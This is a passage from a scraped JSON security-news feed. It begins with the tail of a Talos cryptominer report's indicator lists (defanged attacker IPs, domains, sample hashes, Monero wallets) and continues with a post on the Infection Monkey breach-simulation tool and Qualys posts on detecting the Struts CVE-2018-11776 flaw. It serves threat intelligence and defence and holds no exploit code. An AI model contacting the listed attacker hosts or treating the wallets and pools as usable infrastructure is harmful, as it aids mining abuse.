\nhxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg \nhxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408 \n \nSHA-256: \n55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin \n00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin \ncdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh \n959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf \nd11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64 \nda641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin \n2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf \nb1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh \n7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin \n904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg \nf792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin \ndcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin \n3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh \na598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db \n74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt \n \nSamples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net: \n17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0 \n4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86 \n \nWallets \nrocke@live.cn \n44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W \n44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3 \n45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV \n88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto \n \n\n\n#### 8220 Gang\n\n45[.]32[.]39[.]40:8220 \n45[.]77[.]24[.]16 \n54[.]37[.]57[.]99:8220 \n67[.]21[.]81[.]179:8220 \n67[.]231[.]243[.]10:8220 \n98[.]142[.]140[.]13:8220 \n98[.]142[.]140[.]13:3333 \n98[.]142[.]140[.]13:8888 \n104[.]129[.]171[.]172:8220 \n104[.]225[.]147[.]196:8220 \n128[.]199[.]86[.]57:8220 \n142[.]4[.]124[.]50:8220 \n142[.]4[.]124[.]164:8220 \n158[.]69[.]133[.]17:8220 \n158[.]69[.]133[.]18:8220 \n158[.]69[.]133[.]20:3333 \n162[.]212[.]157[.]244:8220 \n165[.]227[.]215[.]212:8220 \n185[.]82[.]218[.]206:8220 \n192[.]99[.]142[.]226:8220 \n192[.]99[.]142[.]227 \n192[.]99[.]142[.]232:8220 \n192[.]99[.]142[.]235:8220 \n192[.]99[.]142[.]240:8220 \n192[.]99[.]142[.]248:8220 \n192[.]99[.]142[.]249:3333 \n192[.]99[.]142[.]251:80 \n192[.]99[.]56[.]117:8220 \n195[.]123[.]224[.]186:8220 \n198[.]181[.]41[.]97:8220 \n202[.]144[.]193[.]110:3333 \nhxxps://github[.]com/MRdoulestar/whatMiner \n \n1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13 \ne2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e \n31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1 \ncb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35 \ncfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e \nefbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803 \n384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52 \n \nSamples associated with whatMiner: \nf7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c \n1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7 \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n \nWallets \n41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo \n4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg \n46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S \n \n\n\n#### \n\n#### Tor2mine\n\n107[.]181[.]160[.]197 \n107[.]181[.]174[.]248 \n107[.]181[.]187[.]132 \nasq[.]r77vh0[.]pw \n194[.]67[.]204[.]189 \nqm7gmtaagejolddt[.]onion[.]to \nres1[.]myrms[.]pw \nhxxps://gitlab[.]com/Shtrawban \nrig[.]zxcvb[.]pw \nback123[.]brasilia[.]me \n \n91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe \n44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe \n3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe \nc3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe \n4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1 \n904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat \n4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta \naf780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta \ncc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1 \nee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta \na7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat \n0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php \ne0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat \nb2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1 \n18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin \n1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe \n112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1 \ne1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta \n61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1 \nf1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat \ncce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe \n \n\n\n#### \n\n#### Uncategorized groups\n\n188[.]166[.]38[.]137 \n91[.]121[.]87[.]10 \n94[.]23[.]206[.]130 \n \n46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava \n44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/DemsFFZIKpI)", "cvss3": {}, "published": "2018-12-18T08:33:00", "type": "talosblog", "title": "Connecting the dots between recently active cryptominers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-12-18T16:33:11", "id": "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DemsFFZIKpI/cryptomining-campaigns-2018.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "pentestit": [{"lastseen": "2018-12-03T23:18:27", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[![Infection Monkey 1.6.1](http://pentestit.com/wp-content/uploads/2018/04/Infection-Monkey.png)](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-12-03T22:28:53", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-logo-300x150.png)A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions 2.3.34 and 2.5.16 and before are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to programmatically detect with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n * **Authenticated (Linux/Unix)** - This executes ps -ef command, looks for the presence of the Tomcat process and finds the location of struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat auth to specify the location of the Tomcat configuration file. Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for struts-core.x.jar file under sub directories. It extracts the version from .jar file and compares with vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every possible out-of-the-box template and generic policy. These templates, developed by security experts for Qualys WAF programmable inspection engine, are constantly tested against latests threats for the best detection rate and least false-positives.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-event.png)\n\nCustomers using manual policies instead of templates were potentially not protected though, depending on ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) sliders settings, along with the blocking threshold.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/CVE-2018-11776-manual.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/CVE-2018-11776-manual-threshold.png)\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or of course, by applying a **virtual patch** to QID-150250 from within the WAS module ; which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF, without needing to define manual rules, giving CISO and IT Security organizations time for implementing sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the vulnerability.", "cvss3": {}, "published": "2018-08-23T20:27:19", "type": "qualysblog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2018-7600"], "modified": "2018-08-23T20:27:19", "id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-14T20:46:20", "description": "Ransomware raids aimed at specific targets with big pockets. Another Struts vulnerability -- but scarier than last year\u2019s. An Android spyware that records your phone calls. These are some of the security news that have caught our attention.\n\n### New Struts Bug Should Be Patched Yesterday\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-logo-300x150.png)Apache patched a serious remote code execution vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) affecting all supported versions -- 2.3 to 2.3.34 and 2.5 to 2.5.16 -- of the widely used Struts Java application framework. The bug is considered more dangerous than the one disclosed last year in Struts that was exploited in the massive data breach at Equifax.\n\nIn the Apache [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-057>), the vulnerability is rated \u201cCritical\u201d and users are advised to immediately upgrade to Struts 2.3.35 or Struts 2.5.17.\n\nThe remote code execution becomes possible \u201cwhen using results with no namespace and in same time, its upper action(s) have no or wildcard namespace\u201d and \u201cwhen using url tag which doesn\u2019t have value and action set,\u201d the bulletin reads.\n\nOrganizations should upgrade to the patched Struts versions even if their applications aren\u2019t vulnerable to this bug. \u201cAn inadvertent change to a Struts configuration file may render the application vulnerable in the future,\u201d [stated](<https://semmle.com/news/apache-struts-CVE-2018-11776>) Semmle, whose security researcher Man Yue Mo discovered this vulnerability.\n\nUpgrading should take first priority, considering that Struts is widely used for public web apps, vulnerable systems are easy to identify, and the bug is easy to exploit, according to the company.\n\n\u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk,\u201d said Pavel Avgustinov, a Semmle VP.\n\nWriting in the Qualys blog, Product Management Director Jimmy Graham [noted](<https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776>) that the vulnerability does not exist with a default configuration of Struts, but that \u201cit does exist in commonly seen configurations for some Struts plugins.\u201d\n\n\u201cDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2,\u201d Graham wrote. Qualys has defined two QIDs to detect this vulnerability (QID 13251 and QID 371151), and created dynamic [dashboards](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776?_ga=2.73902801.230834091.1535379602-620242525.1458325156>) to visualize it.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/struts-dashboard-2018.png)\n\nGraham also describes how the Qualys Web Application Firewall (WAF) can mitigate the vulnerability.\n\nMore information:\n\n[Apache Struts 2 namespace Remote Code Execution Vulnerability: CVE-2018-11776](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/?_ga=2.140995313.230834091.1535379602-620242525.1458325156>) _(Qualys)_\n\n[Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>) _(ThreatPost)_\n\n[Admins Urged: Stop Everything and Patch New Apache Struts Flaw](<https://www.infosecurity-magazine.com/news/admins-stop-everything-patch/>) _(InfoSecurity)_\n\n[Experts Urge Rapid Patching of \u2018Struts\u2019 Bug](<https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/>) _(Krebs on Security)_\n\n[PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) _(ThreatPost)_\n\n### Ransomware Campaign Attacks Selected Organizations\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/ransomware-2320941_1280-600x400.jpg)Cyber thieves recently began attacking handpicked corporations with ransomware and demanding skyhigh bitcoin payments.\n\nThe criminals are deliberately targeting specific large businesses, and they\u2019re using ransomware called Ryuk that\u2019s designed for tailored attacks. They reportedly netted more than $600,000 during the campaign\u2019s first two weeks.\n\n\u201cIts encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers,\u201d CheckPoint researchers [wrote](<https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/>).\n\nThe implication is that prior to each attack, \u201cextensive network mapping, hacking and credential collection\u201d is conducted by the miscreants, believed to have ties to the notorious hacker collective Lazarus Group and be experienced in targeted attacks, according to the researchers.\n\nMore information:\n\n[This new ransomware campaign targets business and demands a massive bitcoin ransom](<https://www.zdnet.com/article/this-new-ransomware-campaign-targets-business-and-demands-a-massive-bitcoin-ransom/>) _(ZDnet)_\n\n[Ryuk Ransomware Emerges in Highly Targeted, Highly Lucrative Campaign](<https://threatpost.com/ryuk-ransomware-emerges-in-highly-targeted-highly-lucrative-campaign/136755/>) _(ThreatPost)_\n\n[Ryuk Ransomware Crew Makes $640,000 in Recent Activity Surge](<https://www.bleepingcomputer.com/news/security/ryuk-ransomware-crew-makes-640-000-in-recent-activity-surge/>) _(BleepingComputer)_\n\n### T-Mobile Hacked, Millions Affected\n\nPersonal information of 2 million T-Mobile customers, [including encrypted passwords](<https://motherboard.vice.com/en_us/article/a3qpk5/t-mobile-hack-data-breach-api-customer-data>), may have been accessed by hackers via a breached API on August 20.\n\nThe compromised data may have included names, billing zip codes, phone numbers, email addresses, and account numbers, but not financial information nor Social Security numbers, [according to the company](<https://www.t-mobile.com/customers/6305378821>). T-Mobile hasn\u2019t provided further details on the nature of the attack.\n\nOn related news, customer security PINs from T-Mobile and AT&T were found to be accessible due to unrelated flaws in partners\u2019 websites, [according to BuzzFeed](<https://www.buzzfeednews.com/article/nicolenguyen/tmobile-att-account-pin-security-flaw-apple>). Apple\u2019s online store exposed the T-Mobile data, while the website of phone insurance company Asurion exposed AT&T\u2019s data. Both companies fixed the flaws after being alerted to them.\n\nAccess to a mobile account PIN could let a hacker \u201ceasily commandeer your phone number and use it to trick the SMS-based authentication designed to verify your identity when you log on to your bank, email provider, or social media accounts,\u201d wrote Nicole Nguyen in BuzzFeed.\n\nMeanwhile, a security researcher was able to [enter a Sprint employee portal](<https://techcrunch.com/2018/08/25/hacker-accessed-sprint-portal-customer-data/>) protected by weak credentials, and said customer data could have been accessed.\n\nMore information:\n\n[Passwords Part of Data Breach, T-Mobile Admits: What to Do Now](<https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html>) _(Tom\u2019s Guide)_\n\n[Why T-Mobile's Data Breach Should Be a Wake-Up Call](<https://www.fool.com/investing/2018/08/27/why-t-mobiles-data-breach-should-be-a-wake-up-call.aspx>) _(Motley Fool)_\n\n[2 Million T-Mobile Customers Are Hit by a Data Breach](<https://www.consumerreports.org/privacy/2-million-t-mobile-customers-hit-by-data-breach/>) _(Consumer Reports)_\n\n[Security researchers found vulnerabilities at AT&T, T-Mobile, and Sprint that could have exposed customer data](<https://www.theverge.com/2018/8/25/17781906/att-tmobile-sprint-security-vulnerabilities-customer-information>) _(The Verge)_\n\n[T-Mobile, AT&T customer account PINs were exposed by website flaws](<https://www.engadget.com/2018/08/25/t-mobile-att-pin-vulnerability/>) _(Engadget)_\n\n### Android Malware Records Calls, Takes Videos\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/Android-logo-300x188.png)Malware that infects Android devices and conducts extensive snooping has been discovered bundled in a malicious app that mimics a legitimate one.\n\nCalled Triout, the spyware stealthily can record phone calls, log incoming text messages, take videos, snap photos, collect location data and transmit everything it collects to a command and control center, [according to Bitdefender](<https://www.bitdefender.com/files/News/CaseStudies/study/234/Bitdefender-Whitepaper-Triout-The-Malware-Framework-for-Android-That-Packs-Potent-Spyware-Capabilities.pdf>), which discovered it.\n\n\u201cThe malware was first observed lurking in an app, repackaged to look identical to a legitimate Android app called \u2018Sex Game.\u2019 It was available in the Google Play store starting in 2016, but has since been removed,\u201d a ThreatPost [article](<https://threatpost.com/triout-malware-carries-out-extensive-targeted-android-surveillance/136773/>) reads.\n\nMore information:\n\n[Android 'Triout' spyware records calls, sends photos and text messages to attackers](<https://www.csoonline.com/article/3299700/security/android-triout-spyware-records-calls-sends-photos-and-text-messages-to-attackers.html>) _(CSO)_\n\n[This Android spyware records calls and sends your pictures and location to hackers](<https://www.zdnet.com/article/android-spyware-malware-records-calls-and-sends-your-pictures-to-hackers/>) _(ZDnet)_\n\n[New Android Triout Malware Can Record Phone Calls, Steal Pictures](<https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/>) _(BleepingComputer)_\n\n### In Other News \u2026\n\n * Cyber thieves [stole](<https://cheddars.com/customer-notification/>) payment card information from Cheddar\u2019s Scratch Kitchen restaurants in 23 U.S. states for two months late last year, potentially affecting [almost 600,000 customers](<https://www.prnewswire.com/news-releases/notice-of-unauthorized-access-to-cheddars-scratch-kitchen-guest-data-300701161.html>).\n * Apple was hacked by a 16-year old Australian boy who told authorities he [dreamed of working](<https://hotforsecurity.bitdefender.com/blog/apple-hacked-by-16-year-old-who-dreamed-of-working-for-firm-20254.html>) at the company.\n * Adobe issued [out-of-band fixes](<https://helpx.adobe.com/security/products/photoshop/apsb18-28.html>) for remote code execution vulnerabilities in Photoshop CC, barely a week after its scheduled monthly set of patches.\n * Spyfone, a company that lets parents and employers monitor mobile devices, left an AWS S3 storage bucket unprotected, [exposing all manner of personal data](<https://motherboard.vice.com/amp/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak>) from thousands of customers.", "cvss3": {}, "published": "2018-08-27T18:32:33", "type": "qualysblog", "title": "Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-27T18:32:33", "id": "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "href": "https://blog.qualys.com/news/2018/08/27/security-news-hackers-aim-ransomware-at-big-cos-as-experts-call-for-swift-patching-of-struts-bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "It\u2019s happening more and more. \n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/IMG_3180-1-600x690.jpg)_Gill Langston, a Qualys Director of Product Management, speaks at RSA Conference 2018_\n\nHigh profile vulnerabilities like Meltdown and Spectre are disclosed, and become headline-grabbing news not just in the technology press, but on general news outlets worldwide.\n\nEven if the vulnerabilities aren\u2019t associated with an attack, the news reports rattle C-level executives, who ask the security team for a plan to address the by now notorious bug, and pronto.\n\nOften, a counter-productive disruption of the normal vulnerability and patch management operations ensues, as those involved scramble to draft a response against the clock in a panic atmosphere, punctuated by confusion and finger-pointing.\n\n\u201cShould I just immediately be jumping and reacting? Should I start deploying patches, and then go from there? I\u2019m going to argue that that\u2019s not always the case,\u201d Gill Langston, a Product Management Director at Qualys, said Wednesday during a presentation at RSA Conference 2018.\n\n### The right approach\n\nWhat security teams should aim for is a coherent, appropriate and rational response plan that is grounded in a factual and comprehensive assessment of the situation, said Langston, whose presentation was titled \u201cThe Sky Is Falling! Responding Rationally to Headline Vulnerabilities.\u201d\n\n\u201cHow can I put this together and send something back to the C-level executives that says: \u2018This is my recommendation for now.\u2019 It may not always be to go deploy the patches,\u201d Langston said. \u201cCreate a plan, and then react, review and improve it over time.\u201d\n\nA key step in dealing effectively with this type of \u201cnews event\u201d vulnerabilities is to have a proper and solid vulnerability management and remediation program in place. That way, organizations are in a better position to do a precise risk assessment of disclosed 